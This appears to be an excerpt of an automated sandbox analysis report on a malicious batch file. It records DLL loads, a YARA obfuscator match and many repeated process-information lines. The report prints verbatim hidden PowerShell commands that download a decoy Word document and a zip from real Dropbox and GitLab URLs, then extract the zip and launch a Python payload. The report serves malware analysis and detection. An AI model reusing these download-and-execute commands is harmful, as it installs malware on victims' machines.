              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: ystem.Core.pdb source: powershell.exe, 0000000C.00000002.2210649353.000001F3F14B3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.pdb source: powershell.exe, 00000010.00000002.2475239651.000002441C3D1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tomation.pdb source: powershell.exe, 0000000E.00000002.2324464767.00000254F15AD000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: n.pdb' source: powershell.exe, 0000000E.00000002.2326723218.00000254F17C1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.2210649353.000001F3F1540000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 0000000C.00000002.2210649353.000001F3F1460000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: n.pdb source: powershell.exe, 0000000C.00000002.2211796512.000001F3F1734000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2326723218.00000254F17C1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 0000000C.00000002.2211796512.000001F3F1734000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2324464767.00000254F1549000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ion.pdb source: powershell.exe, 0000000C.00000002.2210649353.000001F3F1529000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb" source: powershell.exe, 0000000C.00000002.2210649353.000001F3F1546000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000C.00000002.2212283273.000001F3F17AE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdb source: powershell.exe, 0000000C.00000002.2210649353.000001F3F1460000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ows\dll\System.Core.pdb source: powershell.exe, 0000000E.00000002.2324464767.00000254F15AD000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.IO.Compression.FileSystem.pdbH source: powershell.exe, 00000010.00000002.2353641518.000002440223A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tem.pdb source: powershell.exe, 00000010.00000002.2475239651.000002441C3D1000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Yara detected Abobus Obfuscator
              Source: Yara matchFile source: hnl2bose13.bat, type: SAMPLE
              Suspicious powershell command line found
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bosse21/mkt/-/raw/main/12Fukrun.zip', 'C:\Users\Public\Document.zip')"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\rz_317.pd clickapp"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx'"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bosse21/mkt/-/raw/main/12Fukrun.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\rz_317.pd clickapp"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD349923EC push 8B485F91h; iretd 16_2_00007FFD349923F1

              Persistence and Installation Behavior

              barindex
              Tries to download and execute files (via powershell)
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bosse21/mkt/-/raw/main/12Fukrun.zip', 'C:\Users\Public\Document.zip')"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bosse21/mkt/-/raw/main/12Fukrun.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
